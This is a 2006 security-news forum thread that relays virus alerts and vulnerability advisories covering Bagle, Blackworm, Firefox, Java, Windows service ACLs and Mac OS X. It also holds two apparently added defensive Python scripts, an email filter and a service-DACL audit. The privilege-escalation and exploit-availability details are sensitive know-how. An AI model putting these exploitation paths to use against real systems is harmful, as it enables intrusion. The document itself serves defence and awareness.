Technical Description: A vulnerability has been identified in Microsoft Windows, which could be exploited by malicious users to obtain elevated privileges. This flaw is due to an access validation in the Simple Service Discovery Protocol (SSDP) Discovery and the Universal Plug and Play Device Host (UPnP) services that fail to properly validate user permissions, which could be exploited by local unprivileged attackers to bypass security restrictions and execute malicious programs with elevated privileges.
-
February 3, 2006 at 9:51 am #3133850
New Bagle.DP Variant – “February Price” theme
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
While most companies can effectively block this, it may be tough in cases where ZIP attachments are allowed and AV signature files haven’t been published yet. The golden rule is to never open attachments.
New Bagle.DP Variant – “February Price” theme
http://secunia.com/virus_information/26794/bagle.dp/
http://vil.nai.com/vil/content/v_138366.htm
EMAIL FORMAT TO BLOCK OR AVOID
From: [SPOOFED]
Subject: price, February price
Message body: price, February price
Attachment:
price.zip
pricelst.zip
pricelist.zip
price_lst.zip
new_price.zip
21_price.zip
February price.zip
February_price.zip
-
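A gateway rule that blocks the email format listed above, as an added example rather than code from the original post or from any AV vendor. The subject and attachment names are taken from the post; reading the comma-separated subject line as alternative subjects, and the fallback of blocking that subject together with any .zip attachment, are assumptions. The sample messages are constructed with Python's standard email package and the "zip" attachment is a placeholder, not a real archive.

```python
"""Gateway rule for the Bagle.DP mailing: block messages that carry one of
the listed ZIP attachment names, or the "price" subject with any ZIP attached.

Added example, not the forum post's or any vendor's code. Subject and
attachment names come from the post; the subject alternatives and the
"subject plus any .zip" fallback are assumptions. Sample messages are
constructed inline and the attachment bytes are not a valid archive.
"""
import email
from email import policy
from email.message import EmailMessage

BAGLE_DP_SUBJECTS = {"price", "february price", "price, february price"}
BAGLE_DP_ATTACHMENTS = {
    "price.zip", "pricelst.zip", "pricelist.zip", "price_lst.zip",
    "new_price.zip", "21_price.zip", "february price.zip", "february_price.zip",
}


def attachment_names(msg) -> list:
    """Lower-cased filenames of every MIME part that declares one."""
    return [p.get_filename().strip().lower() for p in msg.walk() if p.get_filename()]


def filter_message(raw: str):
    """Return (block, reason) for one RFC 822 message given as text."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = (msg["Subject"] or "").strip().lower()
    names = attachment_names(msg)
    hits = [n for n in names if n in BAGLE_DP_ATTACHMENTS]
    if hits:
        return True, "known Bagle.DP attachment name: " + hits[0]
    if subject in BAGLE_DP_SUBJECTS and any(n.endswith(".zip") for n in names):
        return True, "Bagle.DP subject with a ZIP attachment"
    return False, "no Bagle.DP indicators"


def build_sample(subject: str, body: str, attachment: str) -> str:
    """Construct a test message with a placeholder ZIP attachment."""
    msg = EmailMessage()
    msg["From"] = "spoofed@example.invalid"   # the post notes the sender is spoofed
    msg["To"] = "user@example.invalid"
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(b"PK\x03\x04 constructed placeholder, not a valid zip",
                       maintype="application", subtype="zip", filename=attachment)
    return msg.as_string()


if __name__ == "__main__":
    for subj, name in [("price, February price", "price.zip"),
                       ("February price", "attached.zip"),
                       ("Quarterly report", "report.zip")]:
        print(subj, name, filter_message(build_sample(subj, subj, name)))
```

Matching on the MIME-declared filename rather than on body text means a renamed attachment still has to pass the subject rule, which is why the weaker fallback is kept alongside the exact name list.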
February 3, 2006 at 9:51 am #3133851
Mozilla Firefox – New 1.5.0.1 release addresses several security issues
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
All users should update to the latest version of Mozilla Firefox, as several recently discovered security issues have been addressed by this latest release.
http://secunia.com/advisories/18700/
Summary of Security Issues Fixed
Description: Multiple vulnerabilities have been reported in Firefox, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, potentially disclose sensitive information, and potentially compromise a user’s system.
1) Some errors in the JavaScript engine where certain temporary variables are not properly protected may be exploited to execute arbitrary code via a user-defined method triggering garbage collection.
2) An error in the dynamic style handling can be exploited to reference freed memory by changing the style of an element from “position:relative” to “position:static”.
3) An error in the “QueryInterface” method of the Location and Navigator objects can be exploited to cause a memory corruption.
4) An input validation error in the processing of the attribute name when calling “XULDocument.persist()” can be exploited to inject arbitrary XML and JavaScript code in “localstore.rdf”, which will be executed with the permissions of the browser the next time the browser starts up again.
5) Some integer overflows in the E4X, SVG, and Canvas functionalities may be exploited to execute arbitrary code.
6) A boundary error in the “nsExpatDriver::ParseBuffer()” function in the XML parser may be exploited to disclose data on the heap.
7) The internal “AnyName” object of the E4X functionality is not properly protected. This can be exploited to create a communication channel between two windows or frames having different domains.
Solution:
Update to version 1.5.0.1.
http://www.mozilla.com/firefox/
Additional CVE References
CVE-2005-4134
CVE-2006-0292
CVE-2006-0293
CVE-2006-0294
CVE-2006-0295
CVE-2006-0296
CVE-2006-0297
CVE-2006-0298
CVE-2006-0299 -
February 4, 2006 at 9:52 am #3097012
Blackworm (CME 24) – Some Damage, but not as widespread as predicted
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
It may also take a couple of days for damage to show up and to collect any meaningful statistics. Our local news reported that some folks got hit in our metropolitan area of 250,000 residents. It was reported that one local PC company was charging $100 to repair systems, so this had an impact on home users.
So far, in monitoring news sources, the overall damage was less than anticipated. I’ve always been an advocate of security awareness, as it’s important to know how malicious individuals can attack. If there were over-exaggerations by the media, it was helpful, as folks took extra measures in preparation, updating and backing up their data.
Below is a cut/paste of Google News headlines, which is good news so far:
GOOGLE NEWS HEADLINES – February 3, 2006
Weekend Will Tell Kama Sutra Tale
InformationWeek, NY – 2 hours ago
Because most still-infected computers belong to home
users, the real scale of any data loss caused by the
Kama Sutra worm may not be known until early next week
…
All quiet on the Nyxem front
VNUNet.com, Netherlands – 2 hours ago
Anti-virus companies are seeing very damage from the
Nyxem.E worm that was scheduled to start overwriting
data on infected systems earlier today. …
Researchers fear confusion on worm name
Seattle Post Intelligencer – 3 hours ago
By ANICK JESDANUN. NEW YORK — Friday’s
file-destroying worm goes by “Mywife” at Microsoft
Corp. and McAfee Inc., “Blackmal” at Symantec Corp.
and CA Inc. …
Experts: ‘Hype’ May Have Mitigated Worm
Houston Chronicle, United States – 4 hours ago
By ANICK JESDANUN AP Internet Writer. — Companies
and individuals heeded this week’s warning _ some may
call it “hype” _ about …
Was the Kama Sutra worm overhyped?
CNET News.com, CA – 4 hours ago
The Kama Sutra worm, like so many other virus scares,
reminds us and other bloggers of the Y2K mania, albeit
on a smaller scale. …
Worm Attack Fizzles Out
Red Herring, CA – 4 hours ago
A computer worm dubbed Kama Sutra and other names
infected thousands of machines but failed to cause any
significant loss of data. …
Kama Sutra worm hits home
CNN – 9 hours ago
By Marsha Walton. ATLANTA, Georgia (CNN) — Many
computer users around the globe apparently heeded the
warnings about a worm with …
Kama Sutra virus causes little damage
Boston Globe, United States – 9 hours ago
A man is seen in front of a display of computers in an
undated file photo. A computer virus that was designed
to start its malicious …
Kama Sutra assumes damp squid position
Inquirer, UK – 9 hours ago
THE MUCH HYPED Kama Sutra worm tipped to wreak a trail
of destruction in its wake appears to have instead has
raised hardly a whimper never mind a scream. …
Update 4: File-Destroying Worm Causes Little Damage
Forbes – 10 hours ago
By ANICK JESDANUN , 02.03.2006, 09:26 AM. A
file-destroying computer worm set to activate Friday
caused relatively little damage …
File-destroying worm causes little damage
BusinessWeek – 11 hours ago
FEB. 3 8:43 AM ET A file-destroying computer worm set
to activate Friday caused relatively little damage
during the business day …
Kama Sutra worm threat goes soft
CNET News.com, CA – 11 hours ago
The Kama Sutra worm, designed to begin deleting files
on infected computers this morning, has caused
virtually no damage, according to antivirus firms. …
Feared computer worm not so scary in Asia
CTV.ca, Canada – 11 hours ago
Computer users on this side of the continent must be
crossing their fingers as they boot up, but there have
been no reports of any damage from a malicious worm
…
Asia Escapes File-Destroying Worm
CBS News – 11 hours ago
(CBS/AP) A computer worm expected to begin corrupting
files in infected machines around the world Friday
caused no major damage in the Asian financial centers
…
Computer worm doesn’t bite in Hong Kong, Tokyo
USA Today – 11 hours ago
By Sylvia Hui, Associated Press. HONG KONG — A
computer worm expected to begin corrupting files in
infected machines around the …
Free Removal Tools Released as ‘Blackworm’ Approaches
PC Magazine – 12 hours ago
With the clock ticking on a Feb. 3 D-Day for the
activation of the destructive ‘Blackworm’ worm
payload, anti-virus vendors are …
‘Limited’ damage from Nyxem virus
BBC News, UK – 13 hours ago
The Windows virus was set to start deleting popular
file types on 3 February and was known to have
infected more than 300,000 machines. …
Kama Sutra virus fizzles in Japan, Hong Kong
CBC News, Canada – 13 hours ago
Computer security firms were bracing for a computer
virus on Friday expected to corrupt files on thousands
of computers. But early …
Humanity survives Kama Sutra apocalypse
Register, UK – 14 hours ago
Security watchers reckon the Kama Sutra worm, which is
programed to overwrite files on infected Windows PCs
today, will have a damaging but not catastrophic …
File-destroying worm causes no major damage so far in
Hong Kong …
Calgary Sun, Canada – 15 hours ago
By SYLVIA HUI. HONG KONG (AP) – A computer worm
expected to begin corrupting files in infected
machines around the world Friday has …
Kama Sutra quiet so far
NEWS.com.au, Australia – 20 hours ago
AUSTRALIAN IT security professionals have so far
reported few problems from the so-called Kama Sutra
worm, which was due to begin overwriting files on
infected … -
February 4, 2006 at 6:23 pm #3096904
Internet Storm Center Article: Recovering LOST files from a hardrive
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Backups are always beneficial and as CD media is inexpensive, I usually make double copies which are tested in another PC.
The Blackworm (CME-24) payload included capabilities to delete several types of documents and files. Usually, the best “undelete” tools or services aren’t free, and these links can provide starting points.
Internet Storm Center Article: Recovering LOST files from a hardrive
http://www.incidents.org/diary.php?storyid=1096
QUOTE: First, if at all possible, TURN off the computer and put the infected drive on another system that is not infected. If for one reason or another you can not, you should consider one of the cdrom or floppy based recovery systems and an extra drive. You should perform recovery to a different filesystem than the one being recovered from, otherwise you risk overwriting some files as you recover others. Be aware some companies offer demos that identify “lost” files but don’t save the files they find.
-
February 4, 2006 at 6:23 pm #3096903
British Government – Virus Protection Guidelines
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
This is an older Best Practices guideline I found while researching that was issued a few years ago. Most of this is still relevant today.
TEXT — HOW TO PROTECT YOURSELF AND YOUR COMPANY FROM COMPUTER VIRUSES
PDF — HOW TO PROTECT YOURSELF AND YOUR COMPANY FROM COMPUTER VIRUSES
-
February 5, 2006 at 5:54 am #3096827
The Family PC — How to stay safe on the Internet.
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
As parents, we have concerns on Internet safety for all of our family members. This morning I spent some time gathering some of the best published resources out there. Most of these are non-technical and easy-to-understand.
Security is a two part process. Part one is the technical protection associated with anti-virus software, firewalls, Windows Updates, Anti-Spyware, etc. Part two is in the human behavior aspects, where security can be seen as SEC-U-R-IT-Y. The “U-R-IT” part means that “You are it”. While the bad guys are the source of the problem, so is ignoring the risk. For example, if you ignore speed limit or stop signs on the highway, you’ll run into trouble. It’s the same way with computer security.
The best advice I have for parents is “To Teach your Children well”. Spend quality time with family members teaching them to avoid email/IM attachments and URLs, recognizing spam (there are no free lunches out there), and most importantly the bad people on the Internet (e.g., predators – which thankfully law enforcement is on the lookout for). The knowledge of Internet risks and how to avoid them is as important as the technical safeguards we employ on our family PCs.
Below are some resources that might help:
SEARCH ENGINES — There are numerous resources of good pages in google, MSN, or other search engines:
http://www.google.com/search?&q=how+to+stay+safe+on+Internet
http://search.msn.com/results.aspx?q=how+to+stay+safe+on+Internet
GREAT FAMILY PROTECTION LINKS — I particularly liked these for children, and in fact they apply to all home users:
http://www.staysafe.org/
http://www.sass.ca/safe.htm
http://www.safekids.com/
http://www.safeteens.com/safeteens.htm
http://www.bettybookmark.com/i/internetsafety.htm
http://www.staysafeonline.info/
http://www.chaminade.org/MIS/WebSafety/30ways.htm
http://www.dhs.gov/dhspublic/display?theme=76&content=336
http://familyinternet.about.com/cs/internetsafety1/a/aa8safesteps.htm
http://www.wiredsafety.org/
http://www.bbc.co.uk/cumbria/features/2004/03/internet_safety/index.shtml
http://www.bcentral.co.uk/technology/security/stay-safe-online.mspx
http://www.haltabuse.org/resources/online.shtml
http://www.hubbardtwppd.org/Homeland/online.htm
SAFETY QUIZ — Below is a 10 question Internet safety quiz that your family members can take in just a couple of minutes:
http://www.iol.ie/~dromore/safety/quiz/quiz.htm
OTHER GREAT RESOURCES – I’ve always liked the work done by MS “at home”, CERT, and Kim Komando:
http://www.microsoft.com/athome/security/default.mspx
http://www.cert.org/tech_tips/home_networks.html
http://www.komando.com/ -
February 7, 2006 at 6:43 am #3093184
Microsoft HTML Workshop product – New unpatched vulnerability & POC exploit
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
This development tool is part of an SDK that can help Client/Server or web developers in authoring help screens for applications. This unpatched vulnerability is rated moderately critical and an exploit has been published.
Microsoft HTML Help Workshop “hhp” File Handling Buffer Overflow Issue
http://secunia.com/advisories/18740/
http://www.frsirt.com/english/advisories/2006/0446
Rated as : Moderate Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-02-06
Exploits: POC exploit published at FrSIRT’s site
Affected Products: Microsoft HTML Help Workshop version 4.74.8702.0 and prior
Solution: Do not open untrusted “.hhp” files, as there is no officially supplied patch for this issue yet.
Technical Description: A vulnerability has been identified in Microsoft HTML Help Workshop, which could be exploited by attackers to execute arbitrary commands. This flaw is due to a buffer overflow error when processing a specially crafted “.hhp” file containing an overly long “Contents file” field, which could be exploited by remote attackers to compromise a vulnerable system by convincing a user to open a malicious “.hhp” file.
-
February 7, 2006 at 6:43 am #3093183
CAIDA – An Excellent Analysis of Blackworm’s Impact
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
This is some of the best documentation I’ve seen in providing a comprehensive analysis for a major new virus. The link below from CAIDA is chock-full of charts, graphs, and facts. I’m glad that actual damages for the payload triggered on February 3rd were significantly less than predicted.
CAIDA — The Nyxem Email Virus: Analysis and Inferences
http://www.caida.org/analysis/security/blackworm/ -
February 7, 2006 at 6:43 pm #3133095
Safer Internet Day 2006
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
The following are links related to “Safer Internet Day”. This is a good initiative in providing security awareness for home users.
Europe’s Internet safety information resource
http://www.saferinternet.org/ww/en/pub/insafe/index.htm
Internet Safety Home Page
http://www.saferinternet.org/ww/en/pub/insafe/safety.htm
QUOTE: ‘Safer Internet Day’, the initiative is designed to raise awareness of cyber threats. The target audience in this case, however, isn’t the corporate IT-type, but users, specifically targeting parents and children. This year’s Safer Internet Day attempts to ride on the coattails of success of blogging and will distribute its message using exactly the same vehicle.
Activities
Blogging
Chat
Instant Messaging
Mobiles
Online gaming
Online shopping
Issues
Cyberbullying
Gambling
Gaming
Hate speech / racism
Privacy
Phishing
Spam
Spyware
Virus
Useful Info
SAFT guide for parents
Council of Europe Handbook
To surf in safe waters
Insafe newsletter -
February 8, 2006 at 6:43 am #3132902
Sun Java – Security Release for critical vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Users with Sun Java installed should update their systems to protect their browser and PC environment from malicious websites that could affect security controls.
Sun Java Runtime Environment Sandbox Security Bypass Vulnerabilities
http://www.frsirt.com/english/advisories/2006/0467
Advisory ID : FrSIRT/ADV-2006-0467
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-02-08
Technical Description: Seven vulnerabilities were identified in Sun Java JRE (Java Runtime Environment), which could be exploited by malicious web sites to compromise a vulnerable system. These flaws are due to errors in the “reflection” APIs, which could be exploited by attackers to read, write, and execute arbitrary files by convincing a user to visit a specially crafted web page containing a malicious applet.
Affected Products
JDK 5.0 Update 4 and prior
JRE 5.0 Update 4 and prior
SDK 1.4.2_09 and prior
JRE 1.4.2_09 and prior
SDK 1.3.1_16 and prior
JRE 1.3.1_16 and prior
Solution:
JDK and JRE 5.x – Upgrade to JDK and JRE 5.0 Update 6 :
http://java.sun.com/j2se/1.5.0/download.jsp
SDK and JRE 1.4.x – Upgrade to SDK and JRE 1.4.2_10 :
http://java.sun.com/j2se/1.4.2/download.html
SDK and JRE 1.3.x – Upgrade to SDK and JRE 1.3.1_17 :
http://java.sun.com/j2se/1.3/download.html
Reference
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102171-1 -
February 13, 2006 at 7:51 am #3133608
Windows ACL Privilege Escalation – New Exploit Developed
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
System administrators should review this exposure carefully if they are using older versions of XP. Moving to XP SP2 is beneficial as it offers a number of security improvements. Companies should test their applications to ensure they are compliant as the stricter levels of security could create issues for poorly written applications. Still, upgrading to SP2 is worthwhile and goes smoothly in most cases.
Microsoft Windows Service ACLs Local Privilege Escalation Vulnerability
http://www.frsirt.com/english/advisories/2006/0417
Technical Description: A vulnerability has been identified in Microsoft Windows, which could be exploited by malicious users to obtain elevated privileges. This flaw is due to insecure default access controls where the “Authenticated Users” group is granted permissions to modify Simple Service Discovery Protocol (SSDP) and Universal Plug and Play Device Host (UPnP) service configurations, which could be exploited by local unprivileged attackers to change the default binary that is associated with an affected service and execute malicious programs with elevated privileges.
Solution: Upgrade to Microsoft Windows XP SP2 or Microsoft Windows Server 2003 SP1, or change the default ACLs:
http://www.microsoft.com/technet/security/advisory/914457.mspx
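The check below is an added example for this thread and is not code from the post, from FrSIRT or from Microsoft. It takes a service security descriptor in SDDL form (what `sc.exe sdshow <service>` prints) and flags any allow ACE that hands a principal every local user belongs to (Authenticated Users, Everyone, Users, Interactive) a right that lets them take the service over: SERVICE_CHANGE_CONFIG (DC, the right the advisory describes), WRITE_DAC, WRITE_OWNER or the generic write/all rights. It also emits a hardened descriptor with those rights stripped, suitable for `sc.exe sdset`. The SDDL strings in the demo are constructed to show the pattern; they are not the real Windows XP SP1 defaults.

```python
"""Audit a Windows service DACL (SDDL form, as printed by `sc.exe sdshow <svc>`)
for ACEs that let low-privileged principals take the service over.

Added example for this thread; not Microsoft's or the advisory's code.
The SDDL strings in the demo are constructed for illustration, not the
real Windows XP SP1 defaults.
"""
import re

# Service-specific and standard rights: SDDL two-letter form and access-mask bit.
RIGHT_BITS = {
    "CC": 0x0001,      # SERVICE_QUERY_CONFIG
    "DC": 0x0002,      # SERVICE_CHANGE_CONFIG: rewrite binPath, start type, account
    "LC": 0x0004,      # SERVICE_QUERY_STATUS
    "SW": 0x0008,      # SERVICE_ENUMERATE_DEPENDENTS
    "RP": 0x0010,      # SERVICE_START
    "WP": 0x0020,      # SERVICE_STOP
    "DT": 0x0040,      # SERVICE_PAUSE_CONTINUE
    "LO": 0x0080,      # SERVICE_INTERROGATE
    "CR": 0x0100,      # SERVICE_USER_DEFINED_CONTROL
    "SD": 0x00010000,  # DELETE
    "RC": 0x00020000,  # READ_CONTROL
    "WD": 0x00040000,  # WRITE_DAC
    "WO": 0x00080000,  # WRITE_OWNER
    "GA": 0x10000000,  # GENERIC_ALL
    "GX": 0x20000000,  # GENERIC_EXECUTE
    "GW": 0x40000000,  # GENERIC_WRITE (includes SERVICE_CHANGE_CONFIG on services)
    "GR": 0x80000000,  # GENERIC_READ
}

# Any of these lets the holder change what the service runs, or rewrite the
# DACL (directly, or after taking ownership) and then change it.
TAKEOVER_RIGHTS = {"DC", "WD", "WO", "GA", "GW"}

# SDDL abbreviations and raw SIDs of principals any local user belongs to.
LOW_PRIV_TRUSTEES = {
    "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
    "WD": "Everyone",            "S-1-1-0": "Everyone",
    "BU": "Users",               "S-1-5-32-545": "Users",
    "IU": "Interactive",         "S-1-5-4": "Interactive",
}

_ACE_RE = re.compile(r"\(([^()]*)\)")
_DACL_RE = re.compile(r"D:[A-Z]*((?:\([^()]*\))+)")


def _rights(field):
    """Decode an ACE rights field (two-letter tokens or a hex mask) into a set."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {abbr for abbr, bit in RIGHT_BITS.items() if mask & bit}
    return {field[i:i + 2] for i in range(0, len(field) - len(field) % 2, 2)}


def parse_dacl(sddl):
    """Return [(ace_type, rights_set, trustee)] for the DACL portion of sddl."""
    m = _DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for body in _ACE_RE.findall(m.group(1)):
        fields = body.split(";")       # type;flags;rights;objguid;inhguid;trustee
        if len(fields) >= 6:
            aces.append((fields[0], _rights(fields[2]), fields[5]))
    return aces


def find_takeover_aces(sddl):
    """List (trustee name, sorted takeover rights) for every allow ACE that
    grants a low-privileged principal a right from TAKEOVER_RIGHTS."""
    findings = []
    for ace_type, rights, trustee in parse_dacl(sddl):
        if ace_type != "A" or trustee not in LOW_PRIV_TRUSTEES:
            continue
        bad = rights & TAKEOVER_RIGHTS
        if bad:
            findings.append((LOW_PRIV_TRUSTEES[trustee], sorted(bad)))
    return findings


def harden_dacl(sddl):
    """Return sddl with takeover rights removed from low-privileged allow ACEs.
    SYSTEM, Administrators, Power Users and the SACL are left as they are."""
    def fix(m):
        fields = m.group(1).split(";")
        if len(fields) >= 6 and fields[0] == "A" and fields[5] in LOW_PRIV_TRUSTEES:
            field = fields[2]
            if field.lower().startswith("0x"):
                mask = int(field, 16)
                for abbr in TAKEOVER_RIGHTS:
                    mask &= ~RIGHT_BITS[abbr]
                fields[2] = "0x%x" % mask
            else:
                tokens = [field[i:i + 2] for i in range(0, len(field) - len(field) % 2, 2)]
                fields[2] = "".join(t for t in tokens if t not in TAKEOVER_RIGHTS)
        return "(" + ";".join(fields) + ")"
    return _ACE_RE.sub(fix, sddl)


# Constructed sample: the pattern the advisory describes, with Authenticated
# Users (AU) holding DC next to the usual SYSTEM (SY), Administrators (BA)
# and Power Users (PU) entries.
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)"
             "(A;;CCLCSWRPWPDTLOCRRC;;;PU)")

if __name__ == "__main__":
    for who, rights in find_takeover_aces(WEAK_SDDL):
        print("%s can take over the service via %s" % (who, ",".join(rights)))
    print("hardened: " + harden_dacl(WEAK_SDDL))
```

To audit a real box, paste the output of `sc.exe sdshow SSDPSRV` (or `upnphost`) into `find_takeover_aces`; an empty list means no low-privileged group can repoint the service binary. Anything else is a local escalation path, since the service runs as LocalSystem, and the hardened string from `harden_dacl` is what you would apply with `sc.exe sdset` after checking it against the vendor’s documented ACLs.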
-
February 14, 2006 at 4:44 pm #3254416
New Bagle Virus – Olympic-themed variant
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
The social engineering approach used by this latest version of the Bagle virus continues to prove that “if it’s too good to be true, then it’s not.” It’s always beneficial to avoid opening any suspicious attachment or URL link.
New Bagle Virus – Olympic-themed variant
http://www.f-secure.com/weblog/archives/archive-022006.html#00000809
http://vil.nai.com/vil/content/v_138528.htm -
February 16, 2006 at 7:11 pm #3091557
MS06-005 proof of concept exploit released
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
MS06-005 proof of concept exploit released
http://www.incidents.org/diary.php?storyid=1126
QUOTE: The proof of concept exploit for MS06-005 has been released. The exploit crafts a malicious BMP file to perform a buffer overflow in Media Player. Keeping in mind, as Microsoft has pointed out, that the exploiting factor can include other graphics files as well (such as .wmp), it’s a good idea to get it patched ASAP.
-
February 19, 2006 at 11:56 am #3252969
Microsoft Security updates for February 2006 – New Media Player exploits emerge
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Below are some new exploits for MS06-005 and MS06-006 that emerged shortly after Microsoft’s “Patch Tuesday” updates on Valentine’s Day. Where malicious code is easy for the bad guys to develop, the timeframe for reverse engineering is moving to hours and days instead of a couple of weeks. Please update your systems promptly if you haven’t had a chance to do this yet.
FOUR NEW EXPLOITS FROM FEBRUARY UPDATES – from FrSIRT’s website:
2006-02-17 : Microsoft Windows Media Player 10 Plugin Remote Code Execution Exploit (MS06-006)
2006-02-17 : Microsoft Windows Media Player 9 Plugin Remote Code Execution Exploit (MS06-006)
2006-02-16 : Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005) #2
2006-02-15 : Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005)
Microsoft Security Bulletin Summary for February, 2006
http://www.microsoft.com/technet/security/bulletin/ms06-feb.mspx -
February 26, 2006 at 9:42 am #3271758
Apple Mac OS System X – Critical Vulnerability and published Exploit
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Apple will most likely patch this vulnerability soon and Mac users should look for any System X updates. Just as in the Windows environment, everyone needs to be careful of any suspicious email attachments, email URL links, or unfamiliar websites.
Apple Mac OS X Metadata Handling Remote Shell Execution Vulnerability
http://www.frsirt.com/english/advisories/2006/0671
http://secunia.com/advisories/18963/
Description: The vulnerability is caused due to an error in the processing of file association meta data in ZIP archives (stored in the “__MACOSX” folder) and mail messages (defined via the AppleDouble MIME format). This can be exploited to trick users into executing a malicious shell script renamed to a safe file extension stored in a ZIP archive or in a mail attachment. This can also be exploited automatically via the Safari browser when visiting a malicious web site.
Exploit: One exploit has been published and the code can be reviewed at the FrSIRT site
Patches: None published so far
Workarounds: Do not open files in archives or mail attachments originating from untrusted sources. The vulnerability can be mitigated by disabling the “Open safe files after downloading” option in Safari.
-
February 26, 2006 at 9:42 am #3271757
Linux/UNIX – New version of Mare worm circulating
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
UNIX_MARE.F Reported by Trend Micro
ELF_MARE.E Reported by Trend Micro
This executable Linux file (ELF) propagates by taking advantage of the XML-RPC for PHP Remote Code vulnerability.
-
February 26, 2006 at 9:42 am #3271756
Macromedia ShockWave Player ActiveX Installer Buffer Overflow
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
A new vulnerability has been discovered for Macromedia’s Shockwave player that occurs only during install processing. Never install any software by email as virus writers may try to exploit this new vulnerability. Always install software directly from the vendors web site.
Macromedia ShockWave Player ActiveX Installer Buffer Overflow
http://secunia.com/advisories/19009/
Description: The vulnerability is caused due to a boundary error in the Installer ActiveX control. This can be exploited to cause a stack-based buffer overflow via overly long values passed in two specific parameters to the control. Successful exploitation allows arbitrary code execution, but requires that the user is e.g. tricked into visiting a malicious web site that prompts the user to install Shockwave Player. The vulnerability has been reported in versions 10.1.0.11 and prior.
Workaround: The vendor has reported that the vulnerability occurs only during the installation process, and no action needs to be taken by current users.
Solution: Only install ShockWave Player directly from the vendor’s web site.
-
February 27, 2006 at 5:42 am #3273208
Bagle.DW – Disguised as Software Cracking program
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
This new downloader version of Bagle pretends to be a software cracking program, but it attempts to download malicious content from the Internet.
Bagle.DW – Disguised as Software Cracking program
http://vil.nai.com/vil/content/v_138710.htm
http://securityresponse.symantec.com/avcenter/venc/data/w32.beagle.dv.html
W32/Bagle.dw is a trojan downloader that attempts to download and execute files from various compromised websites. As the website being communicated with is normally controlled by the malware author, any files being downloaded can be remotely modified and the behavior of these new binaries altered – possibly with every user infection.
At the time of writing this description, McAfee AVERT did not see the downloading of any files, as they may have been moved or deleted at the remote site. W32/Bagle.dw was mass spammed on February 25th, 2006.
-
February 27, 2006 at 5:42 am #3273207
Haxdoor – Advanced Rootkit design
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
This article by F-Secure describes one of the most advanced rootkit designs. With kernel mode networking API hooks it even has the potential to compromise SSL based security.
http://www.f-secure.com/weblog/archives/archive-022006.html#00000821
QUOTE: Haxdoor is one of the most advanced rootkit malware out there. It is a kernel-mode rootkit, but most of its hooks are in user-mode. It actually injects its hooks into user-mode from the kernel — which is really unique and kind of bizarre. We took a careful look at Backdoor.Win32.Haxdoor.gh (detection added 31 Jan, 2006). It hooks HTTP functionality, redirects traffic, steals private information, and transmits the stolen data to a web-server controlled by the attacker. Most (all?) online banks use SSL encrypted connections to protect transmissions. If Haxdoor hooked networking functionality in the kernel, it would have a hard time phishing since the data would be encrypted. By hooking at a high-enough API level it is able to grab the data before it gets encrypted.
-
February 28, 2006 at 5:42 am #3088133
Snow.A – File infector virus impacts *.EXE files
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Please be careful with all EXE files in email or other sources. So far this new PE based virus is low-risk.
Snow.A – File infector virus impacts *.EXE files
http://vil.nai.com/vil/content/v_138727.htm
This detection is for a Win32 parasitic virus variant that infects Windows portable executable (PE) files.
W32/Snow.a bears the following characteristics:
1. infects PE executable files
2. infected files grow in length by about 243 kilobytes
3. drops and installs WinPcap network drivers
4. drops and auto-starts a copy of itself
5. when an infected file is run, the virus searches for other files to infect on both local and network drives
6. floods the network with spoofed ARP packets (ARP poisoning) -
February 28, 2006 at 5:42 am #3088132
New IE exploit targets older unpatched builds
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
FrSIRT is reporting a brand new IE exploit targeted to XP SP0 (Gold) that appears to be patched in XP SP1 or higher, as well as W/2000 SP4. Still, there might be some folks running “Gold” (and especially W/2000 SP3 in the corporate world) … More can be found at FrSIRT’s site
Microsoft Internet Explorer “IsComponentInstalled()” Remote Stack Overflow Exploit
Date : 28/02/2006
Rated as : Critical
Note : This vulnerability has reportedly been fixed in Windows XP SP1 and Windows 2000 SP4
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com. -
March 4, 2006 at 7:01 pm #3085787
New Bagle variant with “lawsuit theme” spreading
